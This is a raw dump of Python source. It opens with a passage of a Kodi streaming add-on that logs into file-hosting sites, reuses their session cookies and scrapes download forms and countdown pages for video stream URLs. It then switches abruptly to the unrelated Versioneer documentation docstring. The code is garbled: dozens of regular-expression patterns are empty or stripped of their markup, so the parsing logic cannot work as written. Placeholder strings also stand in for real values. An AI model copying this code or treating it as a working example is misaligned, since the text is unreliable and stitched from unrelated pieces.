#validate successful login\n for r in re.finditer(\'my_account\',\n response_data, re.DOTALL):\n loginResult = True\n #validate successful login\n for r in re.finditer(\'logout\',\n response_data, re.DOTALL):\n loginResult = True\n\n if (loginResult == False):\n xbmcgui.Dialog().ok(ADDON.getLocalizedString(30000), ADDON.getLocalizedString(30017))\n log(\'login failed\', True)\n return\n\n for cookie in self.cookiejar:\n for r in re.finditer(\' ([^\\=]+)\\=([^\\s]+)\\s\',\n str(cookie), re.DOTALL):\n cookieType,cookieValue = r.groups()\n if cookieType == \'xfss\':\n self.auth = cookieValue\n if cookieType == \'xfsts\':\n self.auth = cookieValue\n\n return\n\n\n\n ##\n # return the appropriate ""headers"" for FireDrive requests that include 1) user agent, 2) authorization cookie\n # returns: list containing the header\n ##\n def getHeadersList(self,referer=\'\'):\n if ((self.auth != \'\' or self.auth != 0) and referer == \'\'):\n return { \'User-Agent\' : self.user_agent, \'Cookie\' : \'lang=english; login=\'+self.user+\'; xfsts=\'+self.auth+\'; xfss=\'+self.auth+\';\' }\n elif (self.auth != \'\' or self.auth != 0):\n return { \'User-Agent\' : self.user_agent, \'Referer\': referer, \'Cookie\' : \'lang=english; login=\'+self.user+\'; xfsts=\'+self.auth+\'; xfss=\'+self.auth+\';\' }\n else:\n return { \'User-Agent\' : self.user_agent }\n\n ##\n # return the appropriate ""headers"" for FireDrive requests that include 1) user agent, 2) authorization cookie\n # returns: URL-encoded header string\n ##\n def getHeadersEncoded(self, referer=\'\'):\n return urllib.urlencode(self.getHeadersList(referer))\n\n ##\n # retrieve a list of videos, using playback type stream\n # parameters: prompt for video quality (optional), cache type (optional)\n # returns: list of videos\n ##\n def getVideosList(self, folderID=0, cacheType=0):\n\n if \'http://\' in self.domain:\n url = self.domain\n else:\n url = \'http://\' + self.domain\n\n if \'streamcloud.eu\' in self.domain:\n\n url = url + \'/\'\n\n # retrieve all documents\n if folderID == 0:\n url = url+\'?op=my_files\'\n else:\n url = url+\'?op=my_files&fld_id=\'+folderID\n\n\n videos = {}\n if True:\n req = urllib2.Request(url, None, self.getHeadersList())\n\n # if action fails, validate login\n try:\n response = urllib2.urlopen(req)\n except urllib2.URLError, e:\n if e.code == 403 or e.code == 401:\n self.login()\n\n req = urllib2.Request(url, None, self.getHeadersList())\n try:\n response = urllib2.urlopen(req)\n except urllib2.URLError, e:\n log(str(e), True)\n return\n else:\n log(str(e), True)\n return\n\n response_data = response.read()\n response.close()\n\n for r in re.finditer(\'placeholder\\=\\""(Username)\\"" id\\=i\\""(nputLoginEmail)\\"" name\\=\\""login\\""\' ,\n response_data, re.DOTALL):\n loginUsername,loginUsernameName = r.groups()\n self.login()\n\n req = urllib2.Request(url, None, self.getHeadersList())\n try:\n response = urllib2.urlopen(req)\n except urllib2.URLError, e:\n log(str(e), True)\n return\n\n response_data = response.read()\n response.close()\n\n\n # parsing page for videos\n # video-entry\n for r in re.finditer(\'([^\\<]+)\' ,\n response_data, re.DOTALL):\n fileID,url,fileName = r.groups()\n\n\n # streaming\n videos[fileName] = {\'url\': \'plugin://plugin.video.cloudstream?mode=streamURL&instance=\'+self.instanceName+\'&url=\' + url, \'mediaType\' : self.MEDIA_TYPE_VIDEO}\n\n for r in re.finditer(\'([^\\<]+)\' ,\n response_data, re.DOTALL):\n url,fileName = r.groups()\n\n\n # streaming\n videos[fileName] = {\'url\': 
\'plugin://plugin.video.cloudstream?mode=streamURL&instance=\'+self.instanceName+\'&url=\' + url, \'mediaType\' : self.MEDIA_TYPE_VIDEO}\n\n # video-entry - bestream\n for r in re.finditer(\'[^\\<]+([^\\<]+)\' ,\n response_data, re.DOTALL):\n url,fileName = r.groups()\n\n\n # streaming\n videos[fileName] = {\'url\': \'plugin://plugin.video.cloudstream?mode=streamURL&instance=\'+self.instanceName+\'&url=\' + url, \'mediaType\' : self.MEDIA_TYPE_VIDEO}\n\n # video-entry - uptobox\n for r in re.finditer(\'([^\\<]+)\' ,\n response_data, re.DOTALL):\n url,fileName = r.groups()\n\n\n # streaming\n videos[fileName] = {\'url\': \'plugin://plugin.video.cloudstream?mode=streamURL&instance=\'+self.instanceName+\'&url=\' + url, \'mediaType\' : self.MEDIA_TYPE_VIDEO}\n\n if \'realvid.net\' in self.domain:\n for r in re.finditer(\'([^\\<]+)\\s+\' ,\n response_data, re.DOTALL):\n url,fileName = r.groups()\n\n #flatten folders (no clean way of handling subfolders, so just make the root list all folders & subfolders\n #therefore, skip listing folders if we\'re not in root\n# if folderID == 0:\n # folder-entry\n # for r in re.finditer(\'([^\\<]+)\' ,\n# folderID = 0\n# for r in re.finditer(\'\' ,\n# response_data, re.DOTALL):\n# folderID,folderName = r.groups()\n\n #remove   from folderName\n# folderName = re.sub(\'\\ \\;\', \'\', folderName)\n\n # folder\n# if int(folderID) != 0:\n# videos[folderName] = {\'url\': \'plugin://plugin.video.cloudstream?mode=folder&instance=\'+self.instanceName+\'&folderID=\' + folderID, \'mediaType\' : self.MEDIA_TYPE_FOLDER}\n# if folderID == 0:\n for r in re.finditer(\'([^\\<]+)\' ,\n response_data, re.DOTALL):\n folderID,folderName = r.groups()\n\n # folder\n if int(folderID) != 0 and folderName != \' . . \':\n videos[folderName] = {\'url\': \'plugin://plugin.video.cloudstream?mode=folder&instance=\'+self.instanceName+\'&folderID=\' + folderID, \'mediaType\' : self.MEDIA_TYPE_FOLDER}\n\n return videos\n\n\n ##\n # retrieve a video link\n # parameters: title of video, whether to prompt for quality/format (optional), cache type (optional)\n # returns: list of URLs for the video or single URL of video (if not prompting for quality)\n ##\n def getPublicLink(self,url,cacheType=0):\n\n fname = \'\'\n opener = urllib2.build_opener(urllib2.HTTPCookieProcessor(self.cookiejar))\n opener.addheaders = [ (\'User-Agent\' , self.user_agent)]\n req = urllib2.Request(url)\n try:\n response = opener.open(req)\n except urllib2.URLError, e:\n pass\n response.close()\n url = response.url\n\n# opener = urllib2.build_opener(urllib2.HTTPCookieProcessor(self.cookiejar), MyHTTPErrorProcessor)\n opener = urllib2.build_opener(urllib2.HTTPCookieProcessor(self.cookiejar))\n opener.addheaders = [ (\'User-Agent\' , self.user_agent), (\'Referer\', url), (\'Cookie\', \'lang=english; login=\'+self.user+\'; xfsts=\'+self.auth+\'; xfss=\'+self.auth+\';\')]\n\n req = urllib2.Request(url)\n\n\n # if action fails, validate login\n try:\n response = opener.open(req)\n except urllib2.URLError, e:\n if e.code == 403 or e.code == 401:\n self.login()\n\n req = urllib2.Request(url, None, self.getHeadersList())\n try:\n response = opener.open(req)\n except urllib2.URLError, e:\n log(str(e), True)\n return (\'\',\'\')\n else:\n log(str(e), True)\n return (\'\',\'\')\n\n response_data = response.read()\n response.close()\n\n for r in re.finditer(\'\\([^\\<]+)\\<\',\n response_data, re.DOTALL | re.I):\n title = r.group(1)\n if fname == \'\':\n fname = title\n\n url = response.url\n req = urllib2.Request(url)\n\n for r in 
re.finditer(\'name\\=\\""(code)\\"" class\\=\\""(captcha_code)\' ,\n response_data, re.DOTALL):\n loginUsername,loginUsernameName = r.groups()\n self.login()\n\n req = urllib2.Request(url, None, self.getHeadersList())\n try:\n response = urllib2.urlopen(req)\n except urllib2.URLError, e:\n log(str(e), True)\n return (\'\',\'\')\n\n response_data = response.read()\n response.close()\n\n\n if self.domain == \'vidzi.tv\':\n for r in re.finditer(\'(file)\\: \\""([^\\""]+)\\.mp4\\""\' ,response_data, re.DOTALL):\n streamType,streamURL = r.groups()\n return (streamURL + \'.mp4\', fname)\n\n confirmID = 0\n values = {}\n # fetch video title, download URL and docid for stream link\n for r in re.finditer(\'.*?.*?.*?.*?\' ,response_data, re.DOTALL):\n op,usr_login,id,fname,referer = r.groups()\n values = {\n \'op\' : op,\n \'usr_login\' : usr_login,\n \'id\' : id,\n \'fname\' : fname,\n \'referer\' : referer,\n \'method_free\' : \'Free Download\'\n\n }\n\n\n for r in re.finditer(\'.*?.*?.*?.*?.*?.*?\' ,response_data, re.DOTALL):\n op,usr_login,id,fname,referer,hash,submit = r.groups()\n values = {\n \'op\' : op,\n \'usr_login\' : usr_login,\n \'id\' : id,\n \'fname\' : fname,\n \'referer\' : referer,\n \'hash\' : hash,\n \'imhuman\' : submit\n\n }\n\n for r in re.finditer(\'.*?.*?.*?.*?.*?.*?.*?\' ,response_data, re.DOTALL):\n op,usr_login,id,fname,referer,hash,inhu,submit = r.groups()\n values = {\n\n \'_vhash\' : \'i1102394cE\',\n \'gfk\' : \'i22abd2449\',\n \'op\' : op,\n \'usr_login\' : usr_login,\n \'id\' : id,\n \'fname\' : fname,\n \'referer\' : referer,\n \'hash\' : hash,\n \'inhu\' : inhu,\n \'imhuman\' : submit\n\n }\n\n for r in re.finditer(\'.*?.*?.*?\' ,response_data, re.DOTALL):\n op,id,referer,submit = r.groups()\n values = {\n \'op\' : op,\n \'id\' : id,\n \'referer\' : referer,\n \'method_free\' : submit,\n \'download_direct\' : 1\n\n }\n\n for r in re.finditer(\'.*?.*?.*?.*?\' ,response_data, re.DOTALL):\n op,id,rand,referer,submit = r.groups()\n values = {\n \'op\' : op,\n \'id\' : id,\n \'rand\' : rand,\n \'referer\' : referer,\n \'method_free\' : submit,\n \'download_direct\' : 1\n\n }\n for r in re.finditer(\'.*?.*? 
.*?.*?.*?\' ,response_data, re.DOTALL):\n ipcount,op,usr_login,id,fname,referer = r.groups()\n values = {\n \'ipcount_val\' : ipcount,\n \'op\' : op,\n \'usr_login\' : usr_login,\n \'id\' : id,\n \'fname\' : fname,\n \'referer\' : referer,\n \'method_free\' : \'Slow access\'\n }\n\n values = {}\n variable = \'op\'\n for r in re.finditer(\'\' ,response_data, re.DOTALL):\n hidden,value = r.groups()\n values[variable] = value\n\n variable = \'usr_login\'\n for r in re.finditer(\'\' ,response_data, re.DOTALL):\n hidden,value = r.groups()\n values[variable] = value\n\n variable = \'id\'\n for r in re.finditer(\'\' ,response_data, re.DOTALL):\n hidden,value = r.groups()\n values[variable] = value\n\n variable = \'fname\'\n for r in re.finditer(\'\' ,response_data, re.DOTALL):\n hidden,value = r.groups()\n values[variable] = value\n\n variable = \'referer\'\n for r in re.finditer(\'\' ,response_data, re.DOTALL):\n hidden,value = r.groups()\n values[variable] = value\n\n\n variable = \'hash\'\n for r in re.finditer(\'\' ,response_data, re.DOTALL):\n hidden,value = r.groups()\n values[variable] = value\n\n variable = \'inhu\'\n for r in re.finditer(\'\' ,response_data, re.DOTALL):\n hidden,value = r.groups()\n values[variable] = value\n\n variable = \'method_free\'\n for r in re.finditer(\'\' ,response_data, re.DOTALL):\n hidden,value = r.groups()\n values[variable] = value\n\n variable = \'method_premium\'\n for r in re.finditer(\'\' ,response_data, re.DOTALL):\n hidden,value = r.groups()\n values[variable] = value\n\n variable = \'rand\'\n for r in re.finditer(\'\' ,response_data, re.DOTALL):\n hidden,value = r.groups()\n values[variable] = value\n\n variable = \'down_direct\'\n for r in re.finditer(\'\' ,response_data, re.DOTALL):\n hidden,value = r.groups()\n values[variable] = value\n\n variable = \'file_size_real\'\n for r in re.finditer(\'\' ,response_data, re.DOTALL):\n hidden,value = r.groups()\n values[variable] = value\n\n variable = \'imhuman\'\n for r in re.finditer(\'\' ,response_data, re.DOTALL):\n hidden,value = r.groups()\n values[variable] = value\n\n variable = \'gfk\'\n for r in re.finditer(\'(name): \\\'\'+variable+\'\\\', value: \\\'([^\\\']*)\\\'\' ,response_data, re.DOTALL):\n hidden,value = r.groups()\n values[variable] = value\n\n variable = \'_vhash\'\n for r in re.finditer(\'(name): \\\'\'+variable+\'\\\', value: \\\'([^\\\']*)\\\'\' ,response_data, re.DOTALL):\n hidden,value = r.groups()\n values[variable] = value\n\n# values[\'referer\'] = \'\'\n\n for r in re.finditer(\'.*?.*?.*?.*?.*?\' ,response_data, re.DOTALL):\n op,id,rand,referer,plugins,submit = r.groups()\n\n values = {\n \'op\' : op,\n \'id\' : id,\n \'rand\' : rand,\n \'referer\' : referer,\n \'plugins_are_not_allowed\' : plugins,\n \'method_free\' : submit,\n \'download_direct\' : 1\n\n }\n\n\n\n\n# req = urllib2.Request(url, urllib.urlencode(values), self.getHeadersList(url))\n req = urllib2.Request(url)\n\n if self.domain == \'thefile.me\':\n values[\'method_free\'] = \'Free Download\'\n elif self.domain == \'sharesix.com\':\n values[\'method_free\'] = \'Free\'\n\n elif \'streamcloud.eu\' in self.domain:\n xbmcgui.Dialog().ok(ADDON.getLocalizedString(30000), ADDON.getLocalizedString(30037) + str(10))\n xbmc.sleep((int(10)+1)*1000)\n\n elif self.domain == \'vidhog.com\':\n xbmcgui.Dialog().ok(ADDON.getLocalizedString(30000), ADDON.getLocalizedString(30037) + str(15))\n xbmc.sleep((int(15)+1)*1000)\n\n elif self.domain == \'vidto.me\':\n xbmcgui.Dialog().ok(ADDON.getLocalizedString(30000), 
ADDON.getLocalizedString(30037) + str(6))\n xbmc.sleep((int(6)+1)*1000)\n\n elif self.domain == \'vodlocker.com\':\n xbmcgui.Dialog().ok(ADDON.getLocalizedString(30000), ADDON.getLocalizedString(30037) + str(3))\n xbmc.sleep((int(3)+1)*1000)\n\n\n\n elif self.domain == \'hcbit.com\':\n\n try:\n# response = urllib2.urlopen(req)\n response = opener.open(req, urllib.urlencode(values))\n\n except urllib2.URLError, e:\n if e.code == 403 or e.code == 401:\n self.login()\n\n try:\n response = opener.open(req, urllib.urlencode(values))\n except urllib2.URLError, e:\n log(str(e), True)\n return (\'\', \'\')\n else:\n log(str(e), True)\n return (\'\', \'\')\n try:\n if response.info().getheader(\'Location\') != \'\':\n return (response.info().getheader(\'Location\') + \'|\' + self.getHeadersEncoded(url), fname)\n except:\n for r in re.finditer(\'\\\'(file)\\\'\\,\\\'([^\\\']+)\\\'\' ,response_data, re.DOTALL):\n streamType,streamURL = r.groups()\n return (streamURL + \'|\' + self.getHeadersEncoded(url), fname)\n for r in re.finditer(\'\\([^\\<]+)\\<\\/td\\>\' ,response_data, re.DOTALL):\n deliminator,fileName = r.groups()\n for r in re.finditer(\'(\\|)([^\\|]{42})\\|\' ,response_data, re.DOTALL):\n deliminator,fileID = r.groups()\n streamURL = \'http://cloud1.hcbit.com/cgi-bin/dl.cgi/\'+fileID+\'/\'+fileName\n return (streamURL + \'|\' + self.getHeadersEncoded(url), fname)\n\n if self.domain == \'bestreams.net\':\n\n file_id = \'\'\n aff = \'\'\n variable = \'file_id\'\n for r in re.finditer(\'\\\'\'+variable+\'\\\', (\\\')([^\\\']*)\\\'\' ,response_data, re.DOTALL):\n hidden,value = r.groups()\n file_id = value\n\n variable = \'aff\'\n for r in re.finditer(\'\\\'\'+variable+\'\\\', (\\\')([^\\\']*)\\\'\' ,response_data, re.DOTALL):\n hidden,value = r.groups()\n aff = value\n\n xbmc.sleep((int(2)+1)*1000)\n opener = urllib2.build_opener(urllib2.HTTPCookieProcessor(self.cookiejar))\n opener.addheaders = [ (\'User-Agent\' , self.user_agent), (\'Referer\', url), (\'Cookie\', \'lang=1; file_id=\'+file_id+\'; aff=\'+aff+\';\')]\n\n elif self.domain == \'thevideo.me\':\n\n for r in re.finditer(\'\\,\\s+\\\'file\\\'\\s+\\:\\s+\\\'([^\\\']+)\\\'\',\n response_data, re.DOTALL):\n streamURL = r.group(1)\n return (streamURL,fname)\n\n elif self.domain == \'vidzi.tv\':\n\n for r in re.finditer(\'\\s+file:\\s+\\""([^\\""]+)\\""\',\n response_data, re.DOTALL):\n streamURL = r.group(1)\n return (streamURL,fname)\n\n # if action fails, validate login\n try:\n# response = urllib2.urlopen(req)\n response = opener.open(req, urllib.urlencode(values))\n\n except urllib2.URLError, e:\n if e.code == 403 or e.code == 401:\n self.login()\n\n try:\n response = opener.open(req, urllib.urlencode(values))\n except urllib2.URLError, e:\n log(str(e), True)\n return (\'\',\'\')\n else:\n log(str(e), True)\n return (\'\',\'\')\n\n response_data = response.read()\n response.close()\n\n op=\'\'\n for r in re.finditer(\'.*?.*?.*?.*?\' ,response_data, re.DOTALL):\n op,id,rand,referer,submit = r.groups()\n values = {\n \'op\' : op,\n \'id\' : id,\n \'rand\' : rand,\n \'referer\' : referer,\n \'method_free\' : submit,\n \'download_direct\' : 1\n\n }\n\n streamURL=\'\'\n\n title = \'\'\n for r in re.finditer(\'\\<(title)\\>([^\\>]*)\\<\\/title\\>\' ,response_data, re.DOTALL):\n titleID,title = r.groups()\n\n\n # for thefile\n if self.domain == \'thefile.me\':\n\n downloadAddress = \'\'\n for r in re.finditer(\'\\<(img) src\\=\\""http\\:\\/\\/([^\\/]+)\\/[^\\""]+\\"" style\' ,response_data, re.DOTALL):\n downloadTag,downloadAddress = 
r.groups()\n\n for r in re.finditer(\'(\\|)([^\\|]{56})\\|\' ,response_data, re.DOTALL):\n deliminator,fileID = r.groups()\n streamURL = \'http://\'+str(downloadAddress)+\'/d/\'+fileID+\'/video.mp4\'\n\n elif self.domain == \'sharerepo.com\':\n for r in re.finditer(\'(file)\\: \\\'([^\\\']+)\\\'\\,\' ,response_data, re.DOTALL):\n streamType,streamURL = r.groups()\n\n for r in re.finditer(\'(\\|)([^\\|]{60})\\|\' ,response_data, re.DOTALL):\n deliminator,fileID = r.groups()\n streamURL = \'http://37.48.80.43/d/\'+fileID+\'/video.mp4?start=0\'\n\n elif self.domain == \'filenuke.com\':\n for r in re.finditer(\'(\\|)([^\\|]{56})\\|\' ,response_data, re.DOTALL):\n deliminator,fileID = r.groups()\n streamURL = \'http://37.252.3.244/d/\'+fileID+\'/video.flv?start=0\'\n elif self.domain == \'sharerepo.com\':\n for r in re.finditer(\'(file)\\: \\\'([^\\\']+)\\\'\\,\' ,response_data, re.DOTALL):\n streamType,streamURL = r.groups()\n\n elif self.domain == \'letwatch.us\':\n\n for r in re.finditer(\'\\[IMG\\]http://([^\\/]+)\\/\',\n response_data, re.DOTALL):\n IP = r.group(1)\n\n for r in re.finditer(\'\\|([^\\|]{60})\\|\',\n response_data, re.DOTALL):\n fileID = r.group(1)\n streamURL = \'http://\'+IP+\'/\'+fileID+\'/v.flv\'\n\n elif self.domain == \'thevideo.me\':\n\n for r in re.finditer(\'\\,\\s+\\\'file\\\'\\s+\\:\\s+\\\'([^\\\']+)\\\'\',\n response_data, re.DOTALL):\n streamURL = r.group(1)\n\n elif self.domain == \'vidto.me\':\n\n for r in re.finditer(\'var file_link = \\\'([^\\\']+)\\\'\',\n response_data, re.DOTALL):\n streamURL = r.group(1)\n\n elif self.domain == \'allmyvideos.net\':\n\n for r in re.finditer(\'\\""file\\"" : \\""([^\\""]+)\\""\',\n response_data, re.DOTALL):\n streamURL = r.group(1)\n\n elif self.domain == \'realvid.net\':\n\n for r in re.finditer(\'file:\\s?\\\'([^\\\']+)\\\'\',\n response_data, re.DOTALL):\n streamURL = r.group(1)\n\n elif self.domain == \'uptobox.com\' or self.domain == \'uptostream.com\':\n\n for r in re.finditer(\'\\\\s+\\\',\n response_data, re.DOTALL):\n streamURL = r.group(1)\n return (streamURL, fname)\n\n for r in re.finditer(\'\\(\\d+) seconds\' ,response_data, re.DOTALL):\n id,timeout = r.groups()\n\n for r in re.finditer(\'

    (.*?)\' ,response_data, re.DOTALL):\n id,error = r.groups()\n xbmcgui.Dialog().ok(ADDON.getLocalizedString(30000), error)\n return (\'\',\'\')\n\n\n\n\n req = urllib2.Request(url)\n\n if timeout > 0:\n xbmcgui.Dialog().ok(ADDON.getLocalizedString(30000), ADDON.getLocalizedString(30037) + str(timeout))\n\n xbmc.sleep((int(timeout)+1)*1000)\n\n # if action fails, validate login\n try:\n response = opener.open(req, urllib.urlencode(values))\n\n except urllib2.URLError, e:\n if e.code == 403 or e.code == 401:\n self.login()\n\n try:\n response = opener.open(req, urllib.urlencode(values))\n except urllib2.URLError, e:\n log(str(e), True)\n return (\'\',\'\')\n else:\n log(str(e), True)\n return (\'\',\'\')\n\n response_data = response.read()\n response.close()\n\n for r in re.finditer(\'(Click here to start your download)\' ,response_data, re.DOTALL):\n streamURL,downloadlink = r.groups()\n\n #vodlocker.com\n if streamURL == \'\':\n # fetch video title, download URL and docid for stream link\n for r in re.finditer(\'(file)\\: \\""([^\\""]+)""\\,\' ,response_data, re.DOTALL):\n streamType,streamURL = r.groups()\n if \'mp4\' in streamURL:\n break\n\n # mightyupload.com\n if streamURL == \'\':\n # fetch video title, download URL and docid for stream link\n for r in re.finditer(\'var (file_link) = \\\'([^\\\']+)\\\'\' ,response_data, re.DOTALL):\n streamType,streamURL = r.groups()\n\n # vidhog.com\n if streamURL == \'\':\n # fetch video title, download URL and docid for stream link\n for r in re.finditer(\'(product_download_url)=([^\\\']+)\\\'\' ,response_data, re.DOTALL):\n streamType,streamURL = r.groups()\n\n # vidspot.net\n if streamURL == \'\':\n # fetch video title, download URL and docid for stream link\n for r in re.finditer(\'""(file)"" : ""([^\\""]+)""\\,\' ,response_data, re.DOTALL):\n streamType,streamURL = r.groups()\n\n # uploadc.com\n if streamURL == \'\':\n # fetch video title, download URL and docid for stream link\n for r in re.finditer(\'\\\'(file)\\\',\\\'([^\\\']+)\\\'\\)\\;\' ,response_data, re.DOTALL):\n streamType,streamURL = r.groups()\n streamURL = streamURL + \'|\' + self.getHeadersEncoded(url)\n\n# return \'http://93.120.27.PI:KEY.mp4\'\n\n\n return (streamURL, fname)\n\nclass MyHTTPErrorProcessor(urllib2.HTTPErrorProcessor):\n\n def http_response(self, request, response):\n code, msg, hdrs = response.code, response.msg, response.info()\n\n # only add this line to stop 302 redirection.\n if code == 302: return response\n\n if not (200 <= code < 300):\n response = self.parent.error(\n \'http\', request, response, code, msg, hdrs)\n return response\n\n https_response = http_response\n\n\n', '\n# Version: 0.15+dev\n\n""""""The Versioneer - like a rocketeer, but for versions.\n\nThe Versioneer\n==============\n\n* like a rocketeer, but for versions!\n* https://github.com/warner/python-versioneer\n* Brian Warner\n* License: Public Domain\n* Compatible With: python2.6, 2.7, 3.2, 3.3, 3.4, and pypy\n* [![Latest Version]\n(https://pypip.in/version/versioneer/badge.svg?style=flat)\n](https://pypi.python.org/pypi/versioneer/)\n* [![Build Status]\n(https://travis-ci.org/warner/python-versioneer.png?branch=master)\n](https://travis-ci.org/warner/python-versioneer)\n\nThis is a tool for managing a recorded version number in distutils-based\npython projects. The goal is to remove the tedious and error-prone ""update\nthe embedded version string"" step from your release process. 
Making a new\nrelease should be as easy as recording a new tag in your version-control\nsystem, and maybe making new tarballs.\n\n\n## Quick Install\n\n* `pip install versioneer` to somewhere to your $PATH\n* add a `[versioneer]` section to your setup.cfg (see below)\n* run `versioneer install` in your source tree, commit the results\n\n## Version Identifiers\n\nSource trees come from a variety of places:\n\n* a version-control system checkout (mostly used by developers)\n* a nightly tarball, produced by build automation\n* a snapshot tarball, produced by a web-based VCS browser, like github\'s\n ""tarball from tag"" feature\n* a release tarball, produced by ""setup.py sdist"", distributed through PyPI\n\nWithin each source tree, the version identifier (either a string or a number,\nthis tool is format-agnostic) can come from a variety of places:\n\n* ask the VCS tool itself, e.g. ""git describe"" (for checkouts), which knows\n about recent ""tags"" and an absolute revision-id\n* the name of the directory into which the tarball was unpacked\n* an expanded VCS keyword ($Id$, etc)\n* a `_version.py` created by some earlier build step\n\nFor released software, the version identifier is closely related to a VCS\ntag. Some projects use tag names that include more than just the version\nstring (e.g. ""myproject-1.2"" instead of just ""1.2""), in which case the tool\nneeds to strip the tag prefix to extract the version identifier. For\nunreleased software (between tags), the version identifier should provide\nenough information to help developers recreate the same tree, while also\ngiving them an idea of roughly how old the tree is (after version 1.2, before\nversion 1.3). Many VCS systems can report a description that captures this,\nfor example `git describe --tags --dirty --always` reports things like\n""0.7-1-g574ab98-dirty"" to indicate that the checkout is one revision past the\n0.7 tag, has a unique revision id of ""574ab98"", and is ""dirty"" (it has\nuncommitted changes.\n\nThe version identifier is used for multiple purposes:\n\n* to allow the module to self-identify its version: `myproject.__version__`\n* to choose a name and prefix for a \'setup.py sdist\' tarball\n\n## Theory of Operation\n\nVersioneer works by adding a special `_version.py` file into your source\ntree, where your `__init__.py` can import it. This `_version.py` knows how to\ndynamically ask the VCS tool for version information at import time.\n\n`_version.py` also contains `$Revision$` markers, and the installation\nprocess marks `_version.py` to have this marker rewritten with a tag name\nduring the `git archive` command. As a result, generated tarballs will\ncontain enough information to get the proper version.\n\nTo allow `setup.py` to compute a version too, a `versioneer.py` is added to\nthe top level of your source tree, next to `setup.py` and the `setup.cfg`\nthat configures it. This overrides several distutils/setuptools commands to\ncompute the version when invoked, and changes `setup.py build` and `setup.py\nsdist` to replace `_version.py` with a small static file that contains just\nthe generated version data.\n\n## Installation\n\nFirst, decide on values for the following configuration variables:\n\n* `VCS`: the version control system you use. Currently accepts ""git"".\n\n* `style`: the style of version string to be produced. See ""Styles"" below for\n details. 
Defaults to ""pep440"", which looks like\n `TAG[+DISTANCE.gSHORTHASH[.dirty]]`.\n\n* `versionfile_source`:\n\n A project-relative pathname into which the generated version strings should\n be written. This is usually a `_version.py` next to your project\'s main\n `__init__.py` file, so it can be imported at runtime. If your project uses\n `src/myproject/__init__.py`, this should be `src/myproject/_version.py`.\n This file should be checked in to your VCS as usual: the copy created below\n by `setup.py setup_versioneer` will include code that parses expanded VCS\n keywords in generated tarballs. The \'build\' and \'sdist\' commands will\n replace it with a copy that has just the calculated version string.\n\n This must be set even if your project does not have any modules (and will\n therefore never import `_version.py`), since ""setup.py sdist"" -based trees\n still need somewhere to record the pre-calculated version strings. Anywhere\n in the source tree should do. If there is a `__init__.py` next to your\n `_version.py`, the `setup.py setup_versioneer` command (described below)\n will append some `__version__`-setting assignments, if they aren\'t already\n present.\n\n* `versionfile_build`:\n\n Like `versionfile_source`, but relative to the build directory instead of\n the source directory. These will differ when your setup.py uses\n \'package_dir=\'. If you have `package_dir={\'myproject\': \'src/myproject\'}`,\n then you will probably have `versionfile_build=\'myproject/_version.py\'` and\n `versionfile_source=\'src/myproject/_version.py\'`.\n\n If this is set to None, then `setup.py build` will not attempt to rewrite\n any `_version.py` in the built tree. If your project does not have any\n libraries (e.g. if it only builds a script), then you should use\n `versionfile_build = None`. To actually use the computed version string,\n your `setup.py` will need to override `distutils.command.build_scripts`\n with a subclass that explicitly inserts a copy of\n `versioneer.get_version()` into your script file. See\n `test/demoapp-script-only/setup.py` for an example.\n\n* `tag_prefix`:\n\n a string, like \'PROJECTNAME-\', which appears at the start of all VCS tags.\n If your tags look like \'myproject-1.2.0\', then you should use\n tag_prefix=\'myproject-\'. If you use unprefixed tags like \'1.2.0\', this\n should be an empty string, using either `tag_prefix=` or `tag_prefix=\'\'`.\n\n* `parentdir_prefix`:\n\n a optional string, frequently the same as tag_prefix, which appears at the\n start of all unpacked tarball filenames. If your tarball unpacks into\n \'myproject-1.2.0\', this should be \'myproject-\'. To disable this feature,\n just omit the field from your `setup.cfg`.\n\nThis tool provides one script, named `versioneer`. That script has one mode,\n""install"", which writes a copy of `versioneer.py` into the current directory\nand runs `versioneer.py setup` to finish the installation.\n\nTo versioneer-enable your project:\n\n* 1: Modify your `setup.cfg`, adding a section named `[versioneer]` and\n populating it with the configuration values you decided earlier (note that\n the option names are not case-sensitive):\n\n ````\n [versioneer]\n VCS = git\n style = pep440\n versionfile_source = src/myproject/_version.py\n versionfile_build = myproject/_version.py\n tag_prefix =\n parentdir_prefix = myproject-\n ````\n\n* 2: Run `versioneer install`. 
This will do the following:\n\n * copy `versioneer.py` into the top of your source tree\n * create `_version.py` in the right place (`versionfile_source`)\n * modify your `__init__.py` (if one exists next to `_version.py`) to define\n `__version__` (by calling a function from `_version.py`)\n * modify your `MANIFEST.in` to include both `versioneer.py` and the\n generated `_version.py` in sdist tarballs\n\n `versioneer install` will complain about any problems it finds with your\n `setup.py` or `setup.cfg`. Run it multiple times until you have fixed all\n the problems.\n\n* 3: add a `import versioneer` to your setup.py, and add the following\n arguments to the setup() call:\n\n version=versioneer.get_version(),\n cmdclass=versioneer.get_cmdclass(),\n\n* 4: commit these changes to your VCS. To make sure you won\'t forget,\n `versioneer install` will mark everything it touched for addition using\n `git add`. Don\'t forget to add `setup.py` and `setup.cfg` too.\n\n## Post-Installation Usage\n\nOnce established, all uses of your tree from a VCS checkout should get the\ncurrent version string. All generated tarballs should include an embedded\nversion string (so users who unpack them will not need a VCS tool installed).\n\nIf you distribute your project through PyPI, then the release process should\nboil down to two steps:\n\n* 1: git tag 1.0\n* 2: python setup.py register sdist upload\n\nIf you distribute it through github (i.e. users use github to generate\ntarballs with `git archive`), the process is:\n\n* 1: git tag 1.0\n* 2: git push; git push --tags\n\nVersioneer will report ""0+untagged.NUMCOMMITS.gHASH"" until your tree has at\nleast one tag in its history.\n\n## Version-String Flavors\n\nCode which uses Versioneer can learn about its version string at runtime by\nimporting `_version` from your main `__init__.py` file and running the\n`get_versions()` function. From the ""outside"" (e.g. in `setup.py`), you can\nimport the top-level `versioneer.py` and run `get_versions()`.\n\nBoth functions return a dictionary with different flavors of version\ninformation:\n\n* `[\'version\']`: A condensed version string, rendered using the selected\n style. This is the most commonly used value for the project\'s version\n string. The default ""pep440"" style yields strings like `0.11`,\n `0.11+2.g1076c97`, or `0.11+2.g1076c97.dirty`. See the ""Styles"" section\n below for alternative styles.\n\n* `[\'full-revisionid\']`: detailed revision identifier. For Git, this is the\n full SHA1 commit id, e.g. ""PI:KEY"".\n\n* `[\'dirty\']`: a boolean, True if the tree has uncommitted changes. Note that\n this is only accurate if run in a VCS checkout, otherwise it is likely to\n be False or None\n\n* `[\'error\']`: if the version string could not be computed, this will be set\n to a string describing the problem, otherwise it will be None. It may be\n useful to throw an exception in setup.py if this is set, to avoid e.g.\n creating tarballs with a version string of ""unknown"".\n\nSome variants are more useful than others. Including `full-revisionid` in a\nbug report should allow developers to reconstruct the exact code being tested\n(or indicate the presence of local changes that should be shared with the\ndevelopers). 
